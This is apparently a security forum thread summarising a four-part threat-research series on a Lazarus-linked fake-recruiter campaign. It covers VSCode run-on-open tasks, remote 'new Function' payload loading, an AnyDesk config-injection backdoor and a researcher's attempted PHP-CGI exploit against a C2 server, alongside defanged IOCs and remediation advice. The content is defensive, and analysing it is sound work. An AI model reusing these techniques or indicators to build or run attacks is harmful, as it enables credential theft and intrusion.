Malware News Hunting Lazarus Part IV: Real Blood on the Wire Part IV

[Khushal]

Content source

https://redasgard.com/blog/hunting-lazarus-part4-real-blood-on-the-wire

Hunting Lazarus Part IV: Real Blood on the WirePart IV: https://redasgard.com/blog/hunting-lazarus-part4-real-blood-on-the-wire
Part III: https://redasgard.com/blog/hunting-lazarus-part3-infrastructure-too-perfect
Part II: https://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop
Part I: https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure

 

[Bot]

This Red Asgard “Hunting Lazarus” series (Part I–IV, dated January 12, 2026 through February 3, 2026) is a high-signal write-up on the “Contagious Interview” fake-recruiter/fake-freelance workflow being used to deliver credential stealers and follow-on access. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure))

What the 4 parts add up to (defender-focused)

• Part I (initial repo booby-trap + infra mapping): Malicious “developer project” content using VSCode task auto-execution (run-on-folder-open) and JavaScript Function.constructor-style execution to pull/execute payloads; modular stealers/backdoor components; custom binary protocol on non-standard ports; and persistence/masquerading techniques (including filenames like “Runtime Broker.exe” and a startup “Windows Update Script.pyw”). ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure))
• Part II (dead drop resiliency): A documented shift from Pastebin-style dead drops to blockchain-based payload resolution (Polygon NFT contracts returning code), executed via “new Function(…, payload)” patterns; plus VM/sandbox evasion signals and a very fast time-to-compromise once the folder is opened and the workspace is trusted. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop))
• Part III (second family + standardized hosting footprint): Discovery of an additional malware family (“OtterCookie”) operating alongside the earlier tooling, and a broader infrastructure picture with repeatable/standard port fingerprints (notably BeaverTail on 1244 and OtterCookie on 5918 on the same servers), suggesting Infrastructure-as-Code style deployment and “ghost” C2 nodes not yet in public TI. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part3-infrastructure-too-perfect))
• Part IV (validation it’s “real” + victim impact + AnyDesk backdoor): The authors state they confirmed operational impact by recovering large-scale stolen credential data and then describe follow-on persistence/remote access via AnyDesk (including credential injection into AnyDesk config), plus additional detection content (YARA set) and updated infra notes. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part4-real-blood-on-the-wire))

Practical takeaways for MalwareTips readers

• Do not “test run” recruiter/freelancer repos on your daily machine. Use a disposable VM with no saved browser passwords, no wallet extensions, and no access to production credentials. This campaign explicitly relies on “clone and run it live while we watch” social engineering. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop))
• Treat VSCode/Cursor workspace trust as a security boundary. The reported technique abuses tasks that trigger on folder open and hides execution output. The safest habit is: do not trust unknown workspaces; inspect .vscode/ and build scripts before anything runs. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure))
• Hunt for “developer-looking” persistence and LOL-ish tradecraft, not just EXEs: suspicious .vscode tasks, unexpected Node.js execution chains, and “Function.constructor / new Function” patterns loading remote code are major red flags in real projects. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure))
• Watch for remote admin tooling you didn’t install (especially AnyDesk in this series) and treat it as high priority to investigate, because it can represent persistent interactive access rather than “just” credential theft. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part4-real-blood-on-the-wire))
• Network defenders: The series repeatedly highlights unusual port usage and consistent port groupings across nodes as a detection opportunity (1244/5918 and the higher custom ports discussed in the series). Focus on behavior + port/protocol anomalies, not only static IOCs. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part3-infrastructure-too-perfect))

If someone already ran one of these “interview projects”

• Disconnect the machine from the network.
• From a known-clean device, rotate passwords (email first, then banking/crypto), and revoke active sessions where possible.
• Check for AnyDesk (or other remote admin tools) that you did not intentionally deploy; remove it and treat the device as potentially backdoored if you can’t confidently validate it. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-part4-real-blood-on-the-wire))
• Run full scans with reputable AV/EDR; if strong compromise indicators exist (persistence + credential theft + remote access), prioritize a wipe/rebuild over “cleaning.”

Attribution note: Red Asgard assesses this as Lazarus/Contagious Interview-related; treat the TTPs and defensive guidance as actionable regardless of which exact subgroup is behind it. ([redasgard.com](https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure))

 

[Divergent]

Technical Analysis & Remediation

Campaign Mechanics & Attack Chain
The attack vector remains consistent with previous "Contagious Interview" waves.

Initial Access
Victims are lured via social engineering (fake recruiters) to download malicious repositories or join fake projects (e.g., elvengold[.]com, tokenloopz[.]com).

Execution
Malicious scripts (BeaverTail/InvisibleFerret) execute upon project initialization (e.g., npm start).

Persistence (New)
A Python-based AnyDesk RAT downloads the legitimate AnyDesk binary, installs it, and overwrites the local configuration to grant attackers unattended access.

MITRE ATT&CK Mapping

T1136.001 (Create Account: Local Account) Injecting credentials into service.conf creates a "shadow" access method.

T1219 (Remote Access Software)
Abuse of legitimate AnyDesk software for C2.

T1071.001 (Web Protocols)
C2 communication via HTTP POST to /uploadInfo and /keys.

T1566.002 (Phishing: Spearphishing Link)
Lure domains disguised as blockchain/gaming projects.

Vulnerability Profile
CVE-2024-4577

Definition
PHP-CGI Argument Injection Vulnerability (CVSS 9.8).

CISA KEV Status
Active. Added June 12, 2024.

Relevance
The researchers attempted to exploit this against the Lazarus C2 (146[.]70[.]253[.]107) running XAMPP on Windows Server 2022. The exploit failed because the C2 utilized mod_php instead of CGI, but the error messages leaked backend paths (C:\Users\Administrator\Documents\server2\Backend\).

Advisory
While this specific C2 was not vulnerable, XAMPP installations on Windows are a known target surface for this campaign's infrastructure.

Live Evidence & Indicators of Compromise (IOCs)

Refanged Network Indicators

Primary Operator C2
146[.]70[.]253[.]107 (Port 1224)

AnyDesk RAT C2
95[.]164[.]17[.]24 (Port 1224)

Binary Protocol C2
66[.]235[.]168[.]238 (Ports 22411-22413)

Lure Domains
elvengold[.]com, email[.]tokenloopz[.]com

Host-Based Indicators

Malicious File Path C:\Users\Administrator\Documents\server2\Backend\ (Server-side artifact)

AnyDesk Config Injection

Specific hash found in service.conf 967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d.

Salt values 351535afd2d98b9a3a0e14905a60a345, e43673a2a77ed68fa6e8074167350f8f.

Remediation - THE ENTERPRISE TRACK (SANS PICERL)

Phase 1: Identification & Containment

Network Block
Immediately block all outbound traffic to the C2 IPs (146[.]70[.]253[.]107, 95[.]164[.]17[.]24) and lure domains.

Endpoint Scan
Deploy a targeted hunt for the AnyDesk hash 967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d inside %ProgramData%\AnyDesk\service.conf or ~/.anydesk/service.conf.

Developer Audit
Review workstations running Node.js environments (localhost:3000, localhost:5173) for recent connections to the identified IPs.

Phase 2: Eradication

Remove Persistence
If the hash is found, uninstall AnyDesk completely. Deleting the config file is insufficient; the binary itself may have been replaced or modified by the RAT script.

Kill Processes
Terminate WINSTART.exe and WINEXIT.exe processes associated with the binary beacon protocol.

Phase 3: Recovery

Credential Rotation
Force password resets for all developers who interacted with "freelance" interviews. This includes GitHub, NPM, cloud provider (AWS/Azure), and banking credentials.

Session Revocation
Invalidate all active OIDC/SAML tokens for affected users.

Phase 4: Lessons Learned

Policy Update
Prohibit the use of personal devices for corporate "take-home" coding assessments.

Detection Engineering
Create SIEM alerts for AnyDesk.exe spawning from unexpected directories or making HTTP POST requests to non-AnyDesk IPs (e.g., POST /keys).

Remediation - THE HOME USER TRACK

Priority 1: Safety & Isolation

Immediate Disconnect
If you suspect you ran a "job interview" coding test recently, disconnect the machine from the internet immediately.

Check AnyDesk
Open your AnyDesk settings (or configuration file if you are technical) and check for unauthorized "Unattended Access" profiles. If you didn't set it up, assume it's malicious.

Priority 2: Identity Hygiene

Mass Reset
The malware steals browser databases (Chrome/Firefox/Edge stored passwords). You must assume every password saved in your browser is compromised. Reset them from a clean device (like your phone).

Wallet Check
Move funds from hot wallets (MetaMask, Phantom, etc.) to a new cold wallet immediately.

Priority 3: Persistence Removal

Uninstall Remote Tools
Uninstall AnyDesk, TeamViewer, or other remote desktop tools unless strictly necessary. Re-download them only from official sources if needed later.

Hardening & References

CIS Benchmark (Windows)
Ensure "Allow Remote Assistance" is set to Disabled (18.6.1) to reduce RDP attack surface.

AppLocker/WDAC
Block execution of unsigned scripts (JS, PY) from user Downloads or Temp folders.

Sources

Red Asgard Threat Research Team

Complete Investigation Series (Red Asgard)

Official Reporting Channels

FBI IC3 (Internet Crime Complaint Center) Reported 121 victims and banking credentials.

CISA (Cybersecurity and Infrastructure Security Agency) Supplementary report filed regarding the full scope of 857 victims.